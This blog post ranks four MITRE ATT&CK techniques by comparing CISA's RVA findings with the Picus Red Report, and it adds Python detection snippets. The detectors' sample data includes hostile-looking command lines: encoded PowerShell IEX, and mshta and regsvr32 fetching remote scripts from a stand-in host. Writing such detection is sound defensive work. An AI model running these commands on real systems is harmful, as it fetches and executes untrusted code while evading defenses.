
The Top 4 MITRE ATT&CK Techniques from CISA’s RVA Report and Picus Red Report


In 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) performed 112 Risk and Vulnerability Assessments (RVA) of stakeholders across multiple industries to identify vulnerabilities that could be exploited by adversaries [1]. CISA's RVA teams map the findings of each RVA to the MITRE ATT&CK® framework. Leveraging this data, CISA determined the top 3 most successfully utilized ATT&CK techniques in each tactic [2]. Since RVA teams succeeded with these techniques in real environments, adversaries can be expected to use them successfully as well.

Utilizing a different methodology, Picus Labs annually publishes the 10 most prevalent ATT&CK techniques used by adversaries in malware. Following the release of CISA's FY21 RVA analysis, Picus Labs identified the four MITRE ATT&CK techniques that appear both in the FY2021 RVA results and among the Top 10 Most Prevalent MITRE ATT&CK Techniques in the Picus Red Report 2021.

Organizations of all sizes should prioritize these four ATT&CK techniques to enhance their cybersecurity posture: they were the techniques CISA's RVA teams utilized most successfully in assessed organizations, and they were the techniques adversaries used most in their malware.

In this blog post, we explain the four ATT&CK techniques shared by the CISA RVA and the Picus Red Report and show which adversary techniques security teams should focus their defensive security operations on.


CISA’s Risk and Vulnerability Assessments (RVA) Report

The Risk and Vulnerability Assessment (RVA) Report is an annual report published by CISA. The data presented in the CISA RVA Report is collected from various critical government and infrastructure organizations. CISA RVA teams organize and run tests and evaluations such as penetration testing, social engineering, configuration reviews, and detection analysis. The results of these tests and evaluations are combined and mapped to the National Vulnerability Database (NIST NVD) and MITRE ATT&CK so that organizations can take action to remediate weaknesses in their cyber defenses.

The CISA RVA Report for Fiscal Year 2021 (FY2021) was published in May 2022. The report gathers all the vulnerabilities discovered in RVAs throughout the year and maps them to the MITRE ATT&CK framework. It shows the most common vulnerabilities found for each stage of the attack path.

Picus Red Report

The Picus Red Report is an annual report based on research conducted by Picus Labs. In 2021, Picus Labs analyzed more than 200,000 malware samples used by threat actors and determined the 10 most prevalent ATT&CK techniques. 89% of the techniques and sub-techniques listed in the Picus Red Report are also reported as the most successful techniques in the CISA RVA Report.

The Top 4 MITRE ATT&CK Techniques Identified from the CISA’s RVA Analysis and Picus Red Report

Security teams should prioritize and focus on the ATT&CK techniques that they are vulnerable to and that attackers use most. Since the following four techniques are the techniques most successfully utilized by RVA teams (CISA FY2021 RVA analysis) and the most prevalent techniques used by adversaries (Picus Red Report), they are the most likely to be employed successfully against an organization in a cyberattack campaign.

1. MITRE ATT&CK T1059 Command and Scripting Interpreter

T1059 Command and Scripting Interpreter is an Execution technique that cyber threat actors use to run commands, scripts, and binaries on the victim system. This technique was the most prevalent adversary technique in the Picus Red Report 2021 and the most common vulnerability under the TA0002 Execution tactic of the CISA RVA FY2021 Report.

26% of malware reported in the Picus Red Report uses the T1059 Command and Scripting Interpreter technique. On the exploitability side, CISA's RVA teams successfully employed the T1059 Command and Scripting Interpreter technique for Execution in 15.1% of assessed organizations, broken down by sub-technique as follows.

Technique Name                    | Execution (% of assessed organizations)
T1059.001 PowerShell              | 12.7%
T1059.002 AppleScript             | 0.3%
T1059.003 Windows Command Shell   | 2.1%

For more detailed information, you can check our blog post on the T1059 Command and Scripting Interpreter technique.
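The two sub-techniques that dominate the table above, PowerShell and the Windows Command Shell, are usually spotted in process-creation telemetry rather than by signature. The following Python snippet is an added example written for this post, not code from the CISA or Picus reports, of the kind of triage a detection engineer applies to such events: it decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text), checks the parent process, and looks for a few well-known indicators on both the raw and the decoded command line. The event records are constructed sample data, and the parent and token lists are assumptions that would be tuned per environment.

```python
import base64
import re

# Constructed process-creation records (sample data for this example, not
# from the page or from any real assessment). "parent" is the creating process.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc "
                + base64.b64encode("IEX (Get-Content -Raw C:\\Users\\Public\\stage.ps1)"
                                   .encode("utf-16-le")).decode("ascii")},
    {"parent": "cmd.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir C:\\Users"},
    {"parent": "OUTLOOK.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c copy C:\\Users\\Public\\a.txt D:\\backup\\"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed list of parents that rarely have a legitimate reason to start a shell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}
# Indicators checked on the lower-cased command line and, when present, on the
# decoded -EncodedCommand payload as well.
PAYLOAD_PATTERNS = [
    (r"\biex\b", "iex alias"),
    (r"invoke-expression", "Invoke-Expression"),
    (r"downloadstring|downloadfile", "download cradle"),
    (r"frombase64string", "inline base64 decoding"),
    (r"-nop\b", "abbreviated -nop switch"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
]
# Matches -e, -ec, -en, -enc and -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?i)[-/]e(?:c|n|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    match = ENC_RE.search(cmdline)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the list of reasons this process start looks like T1059 abuse (empty = clean)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return []
    reasons = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"interpreter spawned by {parent}")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        text = text + "\n" + decoded      # inspect the decoded payload too
    text = text.lower()
    for pattern, label in PAYLOAD_PATTERNS:
        if re.search(pattern, text):
            reasons.append(label)
    return reasons


def flagged(events, min_reasons=2):
    """Command lines with at least min_reasons indicators; a single weak signal is ignored."""
    return [e["cmdline"] for e in events if len(analyze_event(e)) >= min_reasons]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(len(analyze_event(event)), event["cmdline"][:50], analyze_event(event))
```

With the constructed sample, only the Word-spawned, encoded, hidden-window PowerShell start crosses the two-indicator threshold; the Outlook-spawned cmd.exe collects one reason and stays below it, which is the usual trade-off between a parent-process rule on its own and a combined score.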

2. MITRE ATT&CK T1055 Process Injection

T1055 Process Injection is categorized under both the Privilege Escalation and Defense Evasion tactics in the MITRE ATT&CK Framework. Cyber threat actors use the T1055 Process Injection technique to stay hidden and to elevate their privileges in the victim system.

21% of malware reported in the Picus Red Report uses the T1055 Process Injection technique. On the exploitability side, CISA's RVA teams successfully employed the T1055 Process Injection technique for Privilege Escalation in 19.7% of assessed organizations and for Defense Evasion in 12.5% of assessed organizations.

Technique Name                  | Privilege Escalation (% of assessed organizations) | Defense Evasion (% of assessed organizations)
T1055 Process Injection         | 19.7%                                              | 10.4%
T1055.012 Process Hollowing     | -                                                  | 2.1%

Please check our blog post for more detailed information on this technique.

3. MITRE ATT&CK T1218 Signed Binary Proxy Execution

T1218 Signed Binary Proxy Execution is a Defense Evasion technique that adversaries use to bypass process- or signature-based defenses in the victim's system. Binaries signed with trusted digital certificates are called signed binaries. Process- or signature-based defenses check binaries and allow signed ones to execute on Windows. Adversaries abuse known signed binaries to run their own payloads and avoid detection by security controls.

16% of malware reported in the Picus Red Report uses the T1218 Signed Binary Proxy Execution technique. On the exploitability side, CISA's RVA teams successfully employed the T1218 Signed Binary Proxy Execution technique for Defense Evasion in 22.7% of assessed organizations and for Execution in 22% of assessed organizations.

Technique Name                  | Defense Evasion (% of assessed organizations) | Execution (% of assessed organizations)
T1218.001 Compiled HTML File    | 1.4%                                          | 1.4%
T1218.002 Control Panel         | 0.7%                                          | 0.7%
T1218.003 CMSTP                 | 0.3%                                          | 0.3%
T1218.004 InstallUtil           | 0.3%                                          | 0.3%
T1218.005 Mshta                 | 12.7%                                         | 13.4%
T1218.010 Regsvr32              | 1.4%                                          | 1.4%
T1218.011 Rundll32              | 5.2%                                          | 5.2%

In version 11 of the MITRE ATT&CK Framework, the technique was renamed T1218 System Binary Proxy Execution. For more detailed information, you can check our blog post on the T1218 Signed Binary Proxy Execution technique.
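Because the binaries in the table above are legitimately signed and present on every Windows host, blocking them outright is rarely an option; what separates proxy execution from normal use is the context of the launch. The Python snippet below is an added example for this post, not code from the CISA or Picus reports: it maps a process image to the T1218 sub-technique it belongs to and then scores the launch on context signals a defender can collect from process-creation logs (an Office parent, a remote URL or UNC path in the arguments, a scriptlet or HTA payload, or a payload in a user-writable directory). The event records are constructed sample data and the regular expressions are assumptions to tune locally.

```python
import re

# Constructed process-creation records (sample data for this example, not from
# the page or from any real assessment).
SAMPLE_EVENTS = [
    {"parent": "svchost.exe", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"parent": "WINWORD.EXE", "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/p.hta"},
    {"parent": "cmd.exe", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"parent": "explorer.exe", "image": "C:\\Windows\\hh.exe",
     "cmdline": "hh.exe C:\\Users\\Public\\Downloads\\invoice.chm"},
    {"parent": "msiexec.exe", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\comlib.dll\""},
]

# Signed Windows binaries behind the T1218 sub-techniques listed in this section.
PROXY_BINARIES = {
    "hh.exe": "T1218.001 Compiled HTML File",
    "control.exe": "T1218.002 Control Panel",
    "cmstp.exe": "T1218.003 CMSTP",
    "installutil.exe": "T1218.004 InstallUtil",
    "mshta.exe": "T1218.005 Mshta",
    "regsvr32.exe": "T1218.010 Regsvr32",
    "rundll32.exe": "T1218.011 Rundll32",
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumed context indicators: a URL or UNC path, a script/scriptlet payload, or a
# payload living somewhere an ordinary user can write to.
REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")
SCRIPT_RE = re.compile(r"(?i)scrobj\.dll|javascript:|vbscript:|\.(?:sct|hta|inf)\b")
USER_WRITABLE_RE = re.compile(
    r"(?i)\\(?:users\\[^\\]+\\(?:downloads|appdata|desktop)|programdata|windows\\temp)\\")


def analyze_event(event):
    """Return {"technique": ..., "reasons": [...]} for a proxy binary, or None for anything else."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    technique = PROXY_BINARIES.get(name)
    if technique is None:
        return None
    cmd = event["cmdline"]
    reasons = []
    if event["parent"].rsplit("\\", 1)[-1].lower() in OFFICE_PARENTS:
        reasons.append("spawned by Office application")
    if REMOTE_RE.search(cmd):
        reasons.append("remote resource in command line")
    if SCRIPT_RE.search(cmd):
        reasons.append("script or scriptlet payload indicator")
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("payload in user-writable location")
    return {"technique": technique, "reasons": reasons}


def flagged(events):
    """(technique, command line) pairs for proxy-binary launches with at least one context signal."""
    out = []
    for event in events:
        result = analyze_event(event)
        if result is not None and result["reasons"]:
            out.append((result["technique"], event["cmdline"]))
    return out


if __name__ == "__main__":
    for technique, cmdline in flagged(SAMPLE_EVENTS):
        print(technique, "<-", cmdline)
```

On the sample, the rundll32 launch of a Control Panel applet and the installer's regsvr32 registration of a DLL under Program Files produce no signals and are left alone, while the Office-spawned mshta, the regsvr32 call pointing at a remote scriptlet, and the .chm opened from a Downloads folder are flagged with their sub-technique attached, which is the mapping analysts need to tie an alert back to the table above.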

4. MITRE ATT&CK T1003 OS Credential Dumping

T1003 OS Credential Dumping is a Credential Access technique that adversaries use to obtain login credentials, such as account names and passwords, from the victim system.

14% of malware reported in the Picus Red Report uses the T1003 OS Credential Dumping technique. On the exploitability side, CISA’s RVA teams successfully employed the T1003 OS Credential Dumping technique for Credential Access in 13.1% of assessed organizations.

For more detailed information, please check our blog post on OS Credential Dumping.
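Process injection (section 2) and OS credential dumping both hinge on one process obtaining a handle to another process's memory, so they are often detected from the same telemetry: Sysmon's ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) events. The snippet below is an added example for this post, not code from the CISA or Picus reports or from Sysmon itself. It classifies constructed Sysmon-style records by checking the GrantedAccess mask on handles to lsass.exe against the memory-access rights from winnt.h, and by treating remote thread creation from an unlisted source, or a thread whose start address is not backed by a loaded module, as a T1055 candidate. The records and the two allowlists are assumptions for illustration.

```python
# Constructed Sysmon-style records (sample data for this example, not from the
# page or from any real assessment). EventID 8 = CreateRemoteThread,
# EventID 10 = ProcessAccess; field names follow Sysmon's.
SAMPLE_RECORDS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\ExampleEDR\sensor.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 8, "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartModule": ""},
]

# Process access rights from winnt.h that allow reading or altering another
# process's memory. A handle without any of them (e.g. 0x1400, query-only)
# cannot be used to read credential material out of LSASS.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
MEMORY_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Hypothetical per-environment allowlists: a security agent that legitimately
# reads LSASS, and system processes that legitimately create remote threads.
ALLOWED_LSASS_READERS = {r"c:\program files\exampleedr\sensor.exe"}
ALLOWED_REMOTE_THREAD_SOURCES = {r"c:\windows\system32\svchost.exe",
                                 r"c:\windows\system32\csrss.exe"}


def parse_mask(value):
    """Sysmon logs GrantedAccess as a hex string such as 0x1010."""
    return int(value, 16)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(record):
    """Map one record to the ATT&CK technique it suggests, or None if it looks benign."""
    source = record["SourceImage"].lower()
    if record["EventID"] == 10:
        if basename(record["TargetImage"]) != "lsass.exe":
            return None
        if parse_mask(record["GrantedAccess"]) & MEMORY_RIGHTS == 0:
            return None                      # query-only handle, no memory access
        if source in ALLOWED_LSASS_READERS:
            return None
        return "T1003 OS Credential Dumping"
    if record["EventID"] == 8:
        if not record.get("StartModule"):
            return "T1055 Process Injection"  # thread starts in memory backed by no module
        if source in ALLOWED_REMOTE_THREAD_SOURCES:
            return None
        return "T1055 Process Injection"
    return None


def alerts(records):
    """(record, technique) pairs worth raising to an analyst."""
    out = []
    for record in records:
        technique = classify(record)
        if technique is not None:
            out.append((record, technique))
    return out


if __name__ == "__main__":
    for record, technique in alerts(SAMPLE_RECORDS):
        print(technique, "<-", record["SourceImage"], "->", record["TargetImage"])
```

The mask check is what keeps this rule usable: many legitimate processes open LSASS with query-only rights many times a minute, and alerting on every handle would bury the one that actually requests PROCESS_VM_READ. The allowlists are deliberately keyed on full image paths so that a binary dropped in a user-writable directory under a trusted name is not excused.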

Conclusion

Although they are independent, the CISA RVA Report and the Picus Red Report approach the global cyber threat landscape from different perspectives. While the CISA RVA reports on exploitable vulnerabilities in organizations' networks, the Red Report focuses on techniques commonly used by adversaries.

Comparing the two, the top 4 MITRE ATT&CK techniques that are most successfully utilized by red teamers and most used by adversaries are:

1. T1059 Command and Scripting Interpreter

2. T1055 Process Injection

3. T1218 Signed Binary Proxy Execution

4. T1003 OS Credential Dumping

Unsurprisingly, both reports draw very similar conclusions. The more common a weakness is across target networks, the more adversaries benefit from exploiting it. Therefore, the CISA RVA Report and the Picus Red Report can be seen as two faces of the same coin.

References

[1] https://www.cisa.gov/sites/default/files/publications/FY21-RVA-Analysis_508c.pdf

[2] https://www.cisa.gov/sites/default/files/publications/RVA%20INFOGRAPHIC_508c.pdf
